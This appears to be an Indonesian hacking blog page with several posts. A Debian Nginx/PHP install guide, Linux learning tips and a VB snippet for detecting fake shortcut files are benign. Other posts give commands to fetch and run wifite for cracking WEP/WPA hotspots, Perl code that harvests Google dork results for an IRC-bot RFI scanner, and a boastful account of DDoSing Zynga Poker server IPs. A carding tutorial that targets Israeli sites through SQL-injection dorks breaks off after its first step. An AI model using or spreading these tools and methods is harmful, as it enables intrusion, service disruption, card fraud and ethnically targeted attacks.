Recent Comments

FBS FOREX

Forex Broker Untuk Pemula

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Space For Ads

Space For Ads

Kamis, 30 Desember 2010

Install Web Server Hemat Resource menggunakan Nginx+PHP+MySQL+Debian

Mau share tutor cupu nih inii tutor cupuu saya ambil dari salah satu temen di forum..

yok langsung waee,

Ehmm... temen2 mungkin udh gak asing lg ama Apache, apalg yg terbiasa pake web server instant (XAMPP). Tp tau gak, klo Apache itu sangat boros resource!. Buat yg punya budget gede sih gak masalah bisa beli server dng spek tingging, tp gmn dng yg budgetnya pas2an seperti saya ini? mau gak mau harus cari akal. Salah satunya adalah menggunakan Nginx. Berikut tutornya.

NOTE: Saya menggunakan Debian utk OS nya, utk OS/distro lain belum coba..

Warna merah: adalah error yg mungkin terjadi saat installasi
Warna biru: adalah file2 penting atau lokasi penting yg harus di edit/tambah.

code spoiler : adalah perintah2 yg saya ketikan

FAQ
QUESTION: Kenapa gak pake XAMPP aja yg praktis???
ANSWER: Klo mau yg instant terus, kapan belajarnya..


Bismillah...

1. Edit repositori di /etc/apt/source.list
Code : # nano /etc/apt/sources.list

2. Tambahkan 2 baris berikut,
Code: deb http://packages.dotdeb.org stable all
           deb-src http://packages.dotdeb.org stable all

3. update hasil perubahan repo
Code : # apt-get update


4. Install Nginx, PHP dan semua modul yg di butuhkan
Code: # aptitude install nginx php5-cgi php5-mysql php5-curl php5-gd php5-idn php-pear php5-imagick php5-imap php5-mcrypt php5-memcache php5-mhash php5-ming php5-pspell php5-recode php5-snmp php5-sqlite php5-tidy php5-xmlrpc php5-xsl

5. Coba Nginx yg baru di install
Code: # /etc/init.d/nginx start




lalu buka browser dan ketik http://localhost. Harusnya seperti ini







5. Edit file /etc/php5/cgi/php.ini , cari baris cgi.fix_pathinfo = 0, lalu ubah angka 0 jadi 1. lalu tambahkan juga baris berikut di akhir file,
cgi.fix_pathinfo = 1


save.!!
Istirahat sek bntar.. Duchh, mulai lagi yok..


6. Install MySQL

Code:
# apt-get install mysql-server mysql-client

7. Install lighttpd web server
Code: # apt-get install lighttpd

(Penjelasan: soal e nginx tidak memiliki modul FastCGI sendiri, dia butuh modul dari web server lain. Tapi hanya 1 modul saja yg di butuhkan yaitu spawn-fcgi. Setelah modul di ambil, lighttpd harus di matikan. karna tidak mungkin 2 web server jalan sekaligus dlm port yg sama)

kalo muncul error seperti ini, "Starting web server: lighttpd2009-03-19 15:58:09: (network.c.300) can't bind to port: 80 Address already in use failed!" itu berarti port 80 sudah di gunakan Nginx. Cara mengatasinya adalah, hentikan dlu nginx

Code:
# /etc/init.d/ningx stop

Lalu install ulang lighttpd

Code:
# apt-get install lighttpd

8. Setelah di install, hentikan proses lighttpd, karna yg akan kita gunakan ada Nginx, bukan lighttpd. Kita hanya butuh 1 modul nya saja seperti yg sudah saya jelaskan di atas.

Code:
# /etc/init.d/lighttpd stop


9. Atur agar lighttpd tidak otomatis aktif saat boot
Code:
# update-rc.d -f lighttpd remove
# rm /usr/sbin/lighttpd




10. Buat file /etc/init.d/php-fastcgi utk meng-handle proses dari PHP/FastCGI.

Code:
# nano /etc/init.d/php-fastcgi

Lalu isikan kode berikut:
#! /bin/sh
### BEGIN INIT INFO
# Provides:          php-fastcgi
# Required-Start:    $all
# Required-Stop:     $all
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# Short-Description: Start and stop php-cgi in external FASTCGI mode
# Description:       Start and stop php-cgi in external FASTCGI mode
### END INIT INFO

# Author: Kurt Zankl

# Do NOT "set -e"

PATH=/sbin:/usr/sbin:/bin:/usr/bin
DESC="php-cgi in external FASTCGI mode"
NAME=php-fastcgi
DAEMON=/usr/bin/php-cgi
PIDFILE=/var/run/$NAME.pid
SCRIPTNAME=/etc/init.d/$NAME
PHP_CONFIG_FILE=/etc/php5/cgi/php.ini

# Exit if the package is not installed
[ -x "$DAEMON" ] || exit 0

# Read configuration variable file if it is present
[ -r /etc/default/$NAME ] && . /etc/default/$NAME

# Load the VERBOSE setting and other rcS variables
. /lib/init/vars.sh

# Define LSB log_* functions.
# Depend on lsb-base (>= 3.0-6) to ensure that this file is present.
. /lib/lsb/init-functions

# If the daemon is not enabled, give the user a warning and then exit,
# unless we are stopping the daemon
if [ "$START" != "yes" -a "$1" != "stop" ]; then
log_warning_msg "To enable $NAME, edit /etc/default/$NAME and set START=yes"
exit 0
fi

# Process configuration
export PHP_FCGI_CHILDREN PHP_FCGI_MAX_REQUESTS
DAEMON_ARGS="-q -b $FCGI_HOST:$FCGI_PORT -c $PHP_CONFIG_FILE"

do_start()
{
# Return
#   0 if daemon has been started
#   1 if daemon was already running
#   2 if daemon could not be started
start-stop-daemon --start --quiet --pidfile $PIDFILE --exec $DAEMON --test > /dev/null \
|| return 1
start-stop-daemon --start --quiet --pidfile $PIDFILE --exec $DAEMON \
--background --make-pidfile --chuid $EXEC_AS_USER --startas $DAEMON -- \
$DAEMON_ARGS \
|| return 2
}

do_stop()
{
# Return
#   0 if daemon has been stopped
#   1 if daemon was already stopped
#   2 if daemon could not be stopped
#   other if a failure occurred
start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 --pidfile $PIDFILE > /dev/null # --name $DAEMON
RETVAL="$?"
[ "$RETVAL" = 2 ] && return 2
# Wait for children to finish too if this is a daemon that forks
# and if the daemon is only ever run from this initscript.
# If the above conditions are not satisfied then add some other code
# that waits for the process to drop all resources that could be
# needed by services started subsequently.  A last resort is to
# sleep for some time.
start-stop-daemon --stop --quiet --oknodo --retry=0/30/KILL/5 --exec $DAEMON
[ "$?" = 2 ] && return 2
# Many daemons don't delete their pidfiles when they exit.
rm -f $PIDFILE
return "$RETVAL"
}
case "$1" in
start)
[ "$VERBOSE" != no ] && log_daemon_msg "Starting $DESC" "$NAME"
do_start
case "$?" in
0|1) [ "$VERBOSE" != no ] && log_end_msg 0 ;;
2) [ "$VERBOSE" != no ] && log_end_msg 1 ;;
esac
;;
stop)
[ "$VERBOSE" != no ] && log_daemon_msg "Stopping $DESC" "$NAME"
do_stop
case "$?" in
0|1) [ "$VERBOSE" != no ] && log_end_msg 0 ;;
2) [ "$VERBOSE" != no ] && log_end_msg 1 ;;
esac
;;
restart|force-reload)
log_daemon_msg "Restarting $DESC" "$NAME"
do_stop
case "$?" in
0|1)
do_start
case "$?" in
0) log_end_msg 0 ;;
1) log_end_msg 1 ;; # Old process is still running
*) log_end_msg 1 ;; # Failed to start
esac
;;
*)
# Failed to stop
log_end_msg 1
;;
esac
;;
*)
echo "Usage: $SCRIPTNAME {start|stop|restart|force-reload}" >&2
exit 3
;;
esac



Save!

Buat agar dapat di eksekusi

Code:
# chmod +x /etc/init.d/php-fastcgi

11. Buat file konfigurasi spawn-fcgi

Code:
# nano /etc/default/php-fastcgi

Lalu isikan kode berikut

START=yes

# Which user runs PHP? (default: www-data)

EXEC_AS_USER=www-data

# Host and TCP port for FASTCGI-Listener (default: localhost:9000)

FCGI_HOST=localhost
FCGI_PORT=9000

# Environment variables, which are processed by PHP

PHP_FCGI_CHILDREN=4
PHP_FCGI_MAX_REQUESTS=1000


12. Atur agar spawn-fcgi start saat boot

Code:
# update-rc.d php-fastcgi defaults
# /etc/init.d/php-fastcgi restart



14. sekarang kita konfigurasi default virtual host nya

Code:
# nano /etc/nginx/sites-available/default


lalu isikan kode berikut
server {
        listen          80;
        server_name     localhost;

        # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000
        #
        location ~ \.php$ {
                 root           html;
                 fastcgi_pass   127.0.0.1:9000;
                 fastcgi_index  index.php;
                 fastcgi_param  SCRIPT_FILENAME  /var/www/nginx-default$fastcgi_script_name;
                 include        fastcgi_params;
        }

        location / {
                root /var/www/nginx-default;
                index index.php;
        }
}


(NOTE: Yang harus di sesuaikan adalah baris "fastcgi_param SCRIPT_FILENAME /var/www/nginx-default$fastcgi_script_name;". Sesuaikan dng lokasi document root server kamu. Contoh di atas adalah lokasi defaultnya saja. Juga baris "server_name _;" di sesuaikan dng nama server kamu, misal code-soft.org, dll)

15. edit file Nginx.conf

Code:
# nano /etc/nginx/nginx.conf

Cari baris berikut dan udah angkanya

worker_processes 5;
keepalive_timeout 2;


16. untuk memulai PHP FastCGI daemon pada localhost port 9000, ketik command berikut

Code: # /usr/bin/spawn-fcgi -a 127.0.0.1 -p 9000 -u www-data -g www-data -f /usr/bin/php5-cgi -P /var/run/fastcgi-php.pid




Nah, agar command tsb langsung aktif saat boot, edit file /etc/rc.local, lalu tambahkan kode berikut sebelum tulisan EXIT:

/usr/bin/spawn-fcgi -a 127.0.0.1 -p 9000 -u www-data -g www-data -f /usr/bin/php5-cgi -P /var/run/fastcgi-php.pid

Save..!!
wadoh, capek jugaa yaah ngetik banyak nyaa segituu.. ~_~
hajar dah pokok nyaaa..

17. Restart Nginx

Code:
# /etc/init.d/nginx restart

18. Coba tes menggunakan coding PHP sederhana

Code: # nano /var/www/nginx-default/info.php

PHP Code:
<? phpinfo(); ?>


19. Buka browser, dan ketik http://localhost/info.php... liat hasilnya.


20. Untuk memulai Nginx saat boot, ketik command berikut,

Code: # update-rc.d nginx defaults

Alhamdulilah akhir nya selesai jugaaa,.. :)






Tips belajar Linux yang efektif

Ehmm… kali ini bukan tutor, tapi tips ringan aja. Saya mau coba berbagi pengalaman aja moga bermanfaat khusus nya buat newbie yang mau belajar Linux.

Gak perlu pake intro segala lah, coz saya yakin temen2 di sini pasti udah tau Linux itu apa, hanya mungkin tidak tau bagaimana cara “bersahabat” dng OS yg satu ini. Oke langsung aja,

1. Install Linux ke Harddisk!

Ini hal pertama yang harus kamu lakukan. Bagaimana kamu bisa belajar Linux kalau tidak menginstall nya… “kan ada Live CD? knp harus di install ke HDD…” nah, ini dia cara belajar yang menurut saya kurang tepat (bukan salah loh yah, hanya kurang tepat). Alasan nya ada 2

- Alasan Teknis

CD/DVD Room itu lambat. Jadi kalau kamu lagi asik2 belajar linux, trus tiba2 jadi lemot jng salahkan Linux nya… tapi salahkan diri kamu sendiri knp menggunakan Live CD. Live CD sendiri fungsi nya hanyalah utk mencoba, bukan di gunakan utk mempelajari… cateett…

- Alasan Psikis

Semua orang yang belajar Linux pasti pernah frustasi (trust me…). Master sekalipun pasti pernah frustasi jg saat menggunakan Linux. Nah, kalau kamu tidak menginstall linux ke HDD, apa yang kamu lakukan saat sedang frustasi saat belajar Linux? hmmm… coba saya tebak, Kalau tidak di masukan ke gudang, pasti live CD nya di jadikan ganjelan pintu… trus balik lg deh ke windogs… haha… :D

hal ini memang terkesan sepele, tapi percaya atau tidak kebiasaan yang seperti ini sudah menjamur pada bangsa kita… hihi. Oleh karena itu, paksakan saja! walaupun frustasi tapi itulah jalan yang harus kamu tempuh jika ingin benar2 mengenal Linux luar dan dalam. Bersakit-sakit dahulu, bersenang-senang kemudian… ^^

2. Cukup Linux untuk mesin kamu!

Budayakan Singel boot hanya utk Linux. Karena apa? ini masih berkaitan dng poin pertama alasan psikis, tapi ini lebih keras lagi bro!. Dengan hanya ada Linux di laptop/PC kamu, kamu tidak akan bisa lari dari masalah. Kamu harus menghadapi dan menyelesaikan masalah itu. Inilah essensi dari Linux yg sebenarnya… Kalau kamu dual boot dng Windogs, saat kamu frustasi dng Linux kamu pasti langsung balik le ke windogs… trus me… saya sendiri waktu pertama menginstall Linux ke Laptop saya, saya nekat menghapus windogs di laptop saya.. padahal waktu itu saya masih buta Linux, tapi saya merasakan maanfaat nya!

3. Trial n’ Error itu baik.

Trial and error adalah bagian penting dalam pembelajaran Linux, kalau di terjemahkan mungkin artinya “Mencoba dan gagal”. Jangan takut untuk mencoba hal2 baru di dunia Linux, dan jg jangan takut gagal. Misal, kamu bisa mulai dng multimedia. Bagaimana cara install mp3, video dll… lalu bisa di lanjutkan dng networking, dan seterus nya hingga level server. Dalam melalui semua itu, kamu pasti akan mengalami trial and error, but jng menyerah… teruslah belajar, karna dari trial and error ini kamu akan semakin pintar.

4. Aktif lah dalam komunitas!

Tidak ada orang yang bisa belajar Linux sendiri. Kalau ada yang ngomong dia belajar Linux secara otodidak, it’s totaly nonsense. Nah, kalau kamu menghadapi kesulitan saat belajar, jangan sungkan utk bertanya pada komunitas nya. Misal Debian, kamu bisa bertanya di forums.debian.net. Mereka akan bergotong royong utk membantu kamu. Dukungan komunitas linux sangat kuat, sehingga kamu tidak akan di tinggalkan jika ada masalah. Memang bhs cukup menjadi kendala, tapi kan sudah ada Google Translate? yah itung2 sambil belajar bhs Inggris lah ya.. hehe.. ^^

5. Gunakan lah distribusi yang susah.!

Wew..  tips ini memang cukup radikal, karna dimana-mana orang pasti menyuruh “gunakan dulu ubuntu, mint, mandriva, atau apa aja yg enteng”. Oh c’mon man.. lalu apa beda nya dng windogs kalau begitu? saya no-offence loh yah buat penggemar ubuntu dan turunan nya, sekali lagi ini murni pendapat saya pribadi. Menurut saya memulai dng distro yang terlampau mudah itu tidak berdampak banyak pada kemajuan ilmu Linux kamu, yang ada kamu malah terlena sehingga lupa utk belajar. Kenapa? silahkan baca lagi poin 3 (Trial n Error), kalau terlalu mudah dan hampir tidak menemukan kesulitan, lalu dimana proses belajar nya? Contoh kasus.. kamu mau menggunakan modem, di Ubuntu semua itu tinggal plug n’ play, pasang langsung jalan. Nah, lantas di mana trial n’ error nya? sekali lagi, di mana proses belajar nya?

Cobalah distribusi yg punya tingkat kesulitan menengah ke atas, misal Debian, CentOS, RedHat, Slackware.. sampai yang sulit seperti Gentoo, Arch Linux dan FreeBSD (UNIX). Memang sulit, tapi ibarat kata.. orang lain masih belajar penjumblahan, kamu sudah bermain-main dng perkalian.. ;)

Maju terus open source Indonesia...

Copased from www.hacker-newbie.org

Smoga bermanfaat..

Kamis, 23 Desember 2010

hacking hotspot dengan wifite.py

nh ada tools buat crack pass hotspot wep n wpa.. penggunaannya mudah banget seperti software2 di windows.. didesain untuk backtrack 4,..

downlodnya di
#wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py

trus ketik ini
#chmod +x wifite.py

untuk jalankan nya
#python wifite.py

ini screenshot nya..
[Image: wifite-konsole_mode.png]

nih screenshot toolsnya..

silahkan coba bagi yg berminat.. dijamin ampuh.. itu juga tergantung lagi dari packet2 yg lewat..

Smoga Bermanfaat..

Google multi domain for ur rfi scanner



cuma mau share aja mas" e  mbak" e..
ini aku ada GOOGLE MULTI DOMAIN untuk scanner, jadi biar auto gitu scan nya..

langsung ajaa..
sub se_google_m {
  my ($chan,$key,$nf) = @_;
  my @daftar;
  my $num = 50; my $max = 5000; my $p;
  my @doms = (
    "com","ae","com.ar","at","com.au","be","com.br","ca","ch","cl","de","dk","fi","fr","gr","com.hk",
    "ie","co.il","it","co.jp","co.kr","lt","lv","nl","com.pa","com.pe","pl","pt","ru","com.sg",
    "com.tr","com.tw","com.ua","co.uk","hu","com.af","com","ae","com.ag","com.ai","am","com.ar","as",
    "at","com.au","az","ba","com.bd","be","bg","com.bh","bi","com.bn","com.bo","com.bn","bs","co.bw",
    "com.by","com.bz","ca","cd","cg","ch","ci","co.ck","cl","cn","com.co","co.cr","com.cu","cz","de",
    "dj","dk","dm","com.do","com.ec","ee","com.eg","es","com.et","fi","com.fj","fm","fr","ge","gg",
    "com.gi","gl","gm","gp","gr","com.gt","gy","com.hk","hn","hr","ht","hu","co.id","ie","co.il",
    "im","co.in","is","it","je","com.jm","jo","co.jp","co.ke","com.kh","ki","kg","co.kr","kz","la",
    "li","lk","co.ls","lt","lu","lv","com.ly","co.ma","md","mn","ms","com.mt","mu","mv","mw","com.mx",
    "com.my","com.na","com.nf","com.ng","com.ni","nl","no","com.np","nr","nu","co.nz","com.om","com.pa",
    "com.pe","com.ph","com.pk","pl","pn","com.pr","pt","com.py","com.qa","ro","ru","rw","com.sa","com.sb",
    "sc","se","com.sg","sh","si","sk","sn","sm","st","com.sv","co.th","com.tj","tk","tm","to","tp","com.tr",
    "tt","com.tw","com.ua","co.ug","co.uk","com.uy","co.uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws",
    "co.yu","co.za","co.zm","co.zw");
  my $dom = $doms[rand(scalar(@doms))];
  my $url = "http://www.google.".$dom."/search?&num=".$num."&q=".$key;
  my $murl = "http://www.google.".$dom;
  my $nxurl;
  my $q = bukasitus($url);
  if ( $q =~ /class=b><a href=\"(.*?)\">/ ) {
      my $nxurl = $1;
      msgn($dbgchan,"Google.".$dom,$nxurl);
      msgn($chan,"Google.".$dom,"Scanning...");
  }
  while ( $q =~ m/<h3 class=r><a href=\"http:\/\/(.*?)\"/g ) { push (@daftar, $1); }
  for ($p=50;$p<=$max;$p+=$num) {
    $nxurl = "http://www.google.".$dom."/search?num=".$num."&q=".$key."&start=".$p."&sa=N";
    $q = bukasitus($nxurl);
    while ( $q =~ m/<h3 class=r><a href=\"http:\/\/(.*?)\"/g ) {  push (@daftar, $1);  }
    if ( $q !~ /<h3 class=r><a href=\"http:\/\/(.*?)\"/ ) { return @daftar;  }
  }
  return @daftar;
}


untuk selebihnya, silahkan di explore lagi aja
ini kalau mau auto scan nya..
ini contohnya

if (($com =~ /^autoscan\s+(.+?[=])\s+(.*)/) && (fork() == 0)) { a_scanz($dtarget,$1,$2,$hb,1); exit; }

Smoga Bermanfaat..  

Hasil dari DDOS server Zynga Poker



Nah untuk kali ini saya langsung to the point ajaa di karenakan situasi badan yang kurang memungkinkan..
ip=74.114.14.10,name=New York,uCount=5979,maxUsers=7500,status=OK,id=1,type=normal,langPref=eg ip=74.114.14.11,name=Los Angeles,uCount=4592,maxUsers=7500,status=OK,id=2,type=normal,langPref=en ip=74.114.14.12,name=Chicago,uCount=3710,maxUsers=7500,status=OK,id=3,type=normal,langPref=en ​ ip=74.114.14.13,name=Houston,uCount=4968,maxUsers=7500,status=OK,id=4,type=normal,langPref=eg ​ ip=74.114.14.14,name=San Antonio,uCount=4676,maxUsers=7500,status=OK,id=5,type=normal,langPref=eg ip=74.114.14.15,name=Columbus,uCount=3184,maxUsers=7500,status=OK,id=6,type=normal,langPref=e ​n ip=74.114.14.16,name=Istanbul,uCount=1200,maxUsers=7500,status=OK,id=7,type=normal,langPref=t ​r ip=74.114.14.17,name=Madrid,uCount=2730,maxUsers=7500,status=OK,id=8,type=normal,langPref=es ip=74.114.14.18,name=Fort Worth,uCount=4089,maxUsers=7500,status=OK,id=9,type=normal,langPref=eg ip=74.114.14.19,name=Charlotte,uCount=3258,maxUsers=7500,status=OK,id=10,type=normal,langPref ​=en ip=74.114.14.20,name=El Paso,uCount=3803,maxUsers=7500,status=OK,id=11,type=normal,langPref=eg ip=74.114.14.21,name=Ankara,uCount=992,maxUsers=7500,status=OK,id=12,type=normal,langPref=tr ip=74.114.14.22,name=Barcelona,uCount=2723,maxUsers=7500,status=OK,id=13,type=normal,langPref ​=es ip=74.114.14.23,name=Boston,uCount=3248,maxUsers=7500,status=OK,id=14,type=normal,langPref=en ​ ip=74.114.14.24,name=Denver,uCount=3702,maxUsers=7500,status=OK,id=15,type=normal,langPref=eg ​ ip=74.114.14.25,name=Washington DC,uCount=3263,maxUsers=7500,status=OK,id=16,type=normal,langPref=en ip=74.114.14.26,name=Nashville,uCount=3852,maxUsers=7500,status=OK,id=17,type=normal,langPref ​=eg ip=74.114.14.27,name=Las Vegas,uCount=3246,maxUsers=7500,status=OK,id=18,type=normal,langPref=en ip=74.114.14.28,name=Portland,uCount=3199,maxUsers=7500,status=OK,id=19,type=normal,langPref= ​en ip=74.114.14.29,name=Tucson,uCount=3742,maxUsers=7500,status=OK,id=20,type=normal,langPref=eg ​ ip=74.114.14.30,name=Albuquerque,uCount=3254,maxUsers=7500,status=OK,id=21,type=normal,langPr ​ef=en ip=74.114.14.31,name=Izmir,uCount=1069,maxUsers=7500,status=OK,id=22,type=normal,langPref=tr ip=74.114.14.32,name=Valencia,uCount=2583,maxUsers=7500,status=OK,id=23,type=normal,langPref= ​es ip=74.114.14.33,name=Atlanta,uCount=3841,maxUsers=7500,status=OK,id=24,type=normal,langPref=e ​g ip=74.114.14.34,name=Sacramento,uCount=3273,maxUsers=7500,status=OK,id=25,type=normal,langPre ​f=en ip=74.114.14.35,name=New Orleans,uCount=3224,maxUsers=7500,status=OK,id=26,type=normal,langPref=en ip=74.114.14.36,name=Cleveland,uCount=3610,maxUsers=7500,status=OK,id=27,type=normal,langPref ​=eg ip=74.114.14.37,name=Kansas City,uCount=3185,maxUsers=7500,status=OK,id=28,type=normal,langPref=en ip=74.114.14.38,name=Omaha,uCount=3760,maxUsers=7500,status=OK,id=29,type=normal,langPref=eg ip=74.114.14.39,name=Miami,uCount=3251,maxUsers=7500,status=OK,id=30,type=normal,langPref=en ip=74.114.14.40,name=Mesa,uCount=3209,maxUsers=7500,status=OK,id=31,type=normal,langPref=en ip=74.114.14.41,name=Virginia Beach,uCount=3692,maxUsers=7500,status=OK,id=32,type=normal,langPref=eg ip=74.114.14.42,name=Temecula,uCount=3253,maxUsers=7500,status=OK,id=33,type=normal,langPref= ​en ip=74.114.14.43,name=Berkeley,uCount=3243,maxUsers=7500,status=OK,id=34,type=normal,langPref= ​en ip=74.114.14.44,name=Tulsa,uCount=3213,maxUsers=7500,status=OK,id=35,type=normal,langPref=en ip=74.114.14.45,name=Honolulu,uCount=3288,maxUsers=7500,status=OK,id=36,type=normal,langPref= ​en ip=74.114.14.46,name=Minneapolis,uCount=3844,maxUsers=7500,status=OK,id=37,type=normal,langPr ​ef=eg ip=74.114.14.47,name=Colorado Springs,uCount=3263,maxUsers=7500,status=OK,id=38,type=normal,langPref=en ip=74.114.14.48,name=San Diego,uCount=3215,maxUsers=7500,status=OK,id=39,type=normal,langPref=en ip=74.114.14.49,name=Bursa,uCount=871,maxUsers=7500,status=OK,id=40,type=normal,langPref=tr ip=74.114.14.50,name=Dallas,uCount=3215,maxUsers=7500,status=OK,id=41,type=normal,langPref=en ​ ip=74.114.14.51,name=San Jose,uCount=3554,maxUsers=7500,status=OK,id=42,type=normal,langPref=eg ip=74.114.14.52,name=Indianapolis,uCount=3249,maxUsers=7500,status=OK,id=43,type=normal,langP ​ref=en ip=74.114.14.53,name=Jacksonville,uCount=3722,maxUsers=7500,status=OK,id=44,type=normal,langP ​ref=eg ip=74.114.14.54,name=San Francisco,uCount=3252,maxUsers=7500,status=OK,id=45,type=normal,langPref=en ip=74.114.14.55,name=Austin,uCount=3681,maxUsers=7500,status=OK,id=46,type=normal,langPref=eg ​ ip=74.114.14.56,name=Memphis,uCount=3209,maxUsers=7500,status=OK,id=47,type=normal,langPref=e ​n ip=74.114.14.57,name=Baltimore,uCount=3817,maxUsers=7500,status=OK,id=48,type=normal,langPref ​=eg ip=74.114.14.58,name=Philadelphia,uCount=3272,maxUsers=7500,status=OK,id=49,type=normal,langP ​ref=en ip=74.114.14.59,name=Phoenix,uCount=3236,maxUsers=7500,status=OK,id=50,type=normal,langPref=e ​n ip=74.114.14.60,name=Milwaukee,uCount=3610,maxUsers=7500,status=OK,id=51,type=normal,langPref ​=eg ip=74.114.14.61,name=Seattle,uCount=3240,maxUsers=7500,status=OK,id=52,type=normal,langPref=e ​n ip=74.114.14.62,name=Detroit,uCount=3262,maxUsers=7500,status=OK,id=53,type=normal,langPref=e ​n ip=74.114.14.63,name=Oakland,uCount=3466,maxUsers=7500,status=OK,id=54,type=normal,langPref=e ​g ip=74.114.14.64,name=Raleigh,uCount=3628,maxUsers=7500,status=OK,id=55,type=normal,langPref=e ​g ip=74.114.14.65,name=Wichita,uCount=3607,maxUsers=7500,status=OK,id=56,type=normal,langPref=e ​g ip=74.114.14.66,name=St Louis,uCount=3225,maxUsers=7500,status=OK,id=57,type=normal,langPref=en ip=74.114.14.67,name=Cincinnati,uCount=3275,maxUsers=7500,status=OK,id=58,type=normal,langPre ​f=en ip=74.114.14.68,name=Louisville,uCount=3233,maxUsers=7500,status=OK,id=59,type=normal,langPre ​f=en ip=74.114.14.69,name=California,uCount=3532,maxUsers=7500,status=OK,id=60,type=normal,langPre ​f=cl ip=74.114.14.70,name=SitNGo 1,uCount=2216,maxUsers=7500,status=OK,id=61,type=sitngo,langPref=en ip=74.114.14.71,name=SitNGo 2,uCount=2231,maxUsers=7500,status=OK,id=62,type=sitngo,langPref=en ip=74.114.14.72,name=SitNGo 3,uCount=2214,maxUsers=7500,status=OK,id=63,type=sitngo,langPref=en ip=74.114.14.73,name=SitNGo 4,uCount=2205,maxUsers=7500,status=OK,id=64,type=sitngo,langPref=en ip=74.114.14.74,name=Weekly Tourney 1,uCount=401,maxUsers=7500,status=OK,id=65,type=tourney,langPref=en ip=74.114.14.75,name=Weekly Tourney 2,uCount=459,maxUsers=7500,status=OK,id=66,type=tourney,langPref=en ip=74.114.14.76,name=VIP 1,uCount=571,maxUsers=7500,status=OK,id=67,type=vip,langPref=en ip=74.114.14.77,name=VIP 2,uCount=627,maxUsers=7500,status=OK,id=68,type=vip,langPref=en ip=74.114.14.78,name=Shootout 1,uCount=1738,maxUsers=7500,status=OK,id=69,type=shootout1,langPref=en ip=74.114.14.79,name=Shootout 2,uCount=1731,maxUsers=7500,status=OK,id=70,type=shootout1,langPref=en ip=74.114.14.80,name=Shootout 3,uCount=1733,maxUsers=7500,status=OK,id=71,type=shootout1,langPref=en ip=74.114.14.81,name=Shootout 4,uCount=1671,maxUsers=7500,status=OK,id=72,type=shootout1,langPref=en ip=74.114.14.82,name=Shootout 5,uCount=1725,maxUsers=7500,status=OK,id=73,type=shootout1,langPref=en ip=74.114.14.83,name=Shootout 6,uCount=1705,maxUsers=7500,status=OK,id=74,type=shootout1,langPref=en ip=74.114.14.84,name=Shootout 7,uCount=1721,maxUsers=7500,status=OK,id=75,type=shootout1,langPref=en ip=74.114.14.85,name=Shootout 8,uCount=892,maxUsers=7500,status=OK,id=76,type=shootout3,langPref=en ip=74.114.14.86,name=Shootout 9,uCount=915,maxUsers=7500,status=OK,id=77,type=shootout3,langPref=en ip=74.114.14.87,name=Shootout 10,uCount=931,maxUsers=7500,status=OK,id=78,type=shootout3,langPref=en ip=74.114.14.88,name=Shootout 11,uCount=878,maxUsers=7500,status=OK,id=79,type=shootout3,langPref=en ip=74.114.14.89,name=Shootout 12,uCount=911,maxUsers=7500,status=OK,id=80,type=shootout3,langPref=en

tiap 1 meja punya 1 Ip ...!!

nah..!!

kita cuba DDOS 1 IP nya,,,!! minimal kita pake banyak IP Server untuk men DDOSnya..!!!

tapi sebelum itu kita masuk Meja yang kita mau DDOS..!!

apa yang terjadi..??

ternyata

aku coba ama temenku DDOS Ip : ip=74.114.14.11,name=Los Angeles,uCount=4592,maxUsers=7500,status=OK,id=2,type=normal,langPref=en

dengan 47 Ip berbeda ..!! 1 IP = 3 Bot ,,,hihih bnyak yach ^_^

nich hasilnye..!!

ternyata hasilnya..!! servernya Hanya Down.!!

padhal Aku tunggu tunggu..!! chipnya berhamburan ,,,!! ternyata gk ada ikh..!!

tapi aku LEGa Juga...!!

krna aku bisa tahu Hasilnya..!! walaupun gk menghasilkan apa apa ^_^... 


Teknik baru deteksi shortcut virus

Teknik baru ini disebut MISSING-TARGET dan NO-SHORTCUT, langsung saja penjelasannya..
 Missing-Target yang saya maksudkan disini adalah file shortcut yang sudah kehilangan target-nya atau file shortcut yang tidak memiliki file target.

Kasus yang terjadi:
- Shortcut virus tidak terhapus walaupun induk sudah terhapus. Dengan teknik ini shortcut ini akan terdeteksi sebab file target-nya sudah hilang.

Keuntungan teknik ini:
- Antivirus dapat mengecek file target secara langsung begitu file shortcutnya ditemukan.

Quote:No-Shortcut berarti file tersebut bukanlah shortcut sungguhan melainkan Cuma file tipuan. Sebab ekstensi �lnk� saja dapat menipu user maupun antivirus.

Kasus yang terjadi:
- Beberapa Worm dan virus suka membuat duplikasinya dengan ekstensi �.lnk�
- Beberapa worm dan virus sadar bahwa banyak antivirus lokal yang melewatkan scanning pada file �.lnk�
- Worm dan virus mengganti value command file �.lnk� menjadi value command application agar bisa dieksekusi

Keuntungan teknik ini:
- Antivirus anda dapat mengetahui / membedakan mana shortcut sungguhan dan mana yang palsu.

Berikut ini adalah source code teknik ini.!
Function Tujuan(strPath As String) As String

On Error GoTo rusak
Dim wshShell As Object
Dim wshLink As Object
Set wshShell = CreateObject(�WScript.Shell�)
Set wshLink = wshShell.CreateShortcut(strPath)
Tujuan = wshLink.TargetPath
Set wshLink = Nothing
Set wshShell = Nothing
Exit Function
rusak:

End Function

Sub Scan(filename)
If right(filename, 3) = �lnk� then
If Tujuan(filename) = �� then
�Berarti file ini adalah �NO-SHORTCUT�
Else
If dir(tujuan(filename)) = �� then
�Berarti file ini adalah �MISSING-TARGET�
End if
End if
End sub


Catatan:
Khusus untuk code Missing-target anda bisa ganti dengan code lain. Sebab cara ini terkadang tidak terlalu baik untuk file hidden.
Saya sendiri pakai code Object(filesystemobject).FileExist untuk memeriksa ada tidaknya suatu file.
Dan anda juga perlu ingat satu hal!!! Bahwa tidak selamanya shortcut memiliki target file. Malah ada juga folder yang menjadi target dari suatu shortcut..
Smoga Bermanfaat..
 

Step by step carding

kali ini saya membuat tutorial carding yg dimana target yg kuserang adalah masyarakat yahudi / israel
sebener nya ini tutor buat yg cupu kayak saya, hehehehe..

tools yg di siapkan yaitu:
1google extractor
2Sql exploiter versi brp aja

 tahap tahap yg di lakukan 1
buka google extractor, lalu masukan dork product.asp?id= site:il (harus il, kalo .id jangan sampe, awas kalo sampe id)
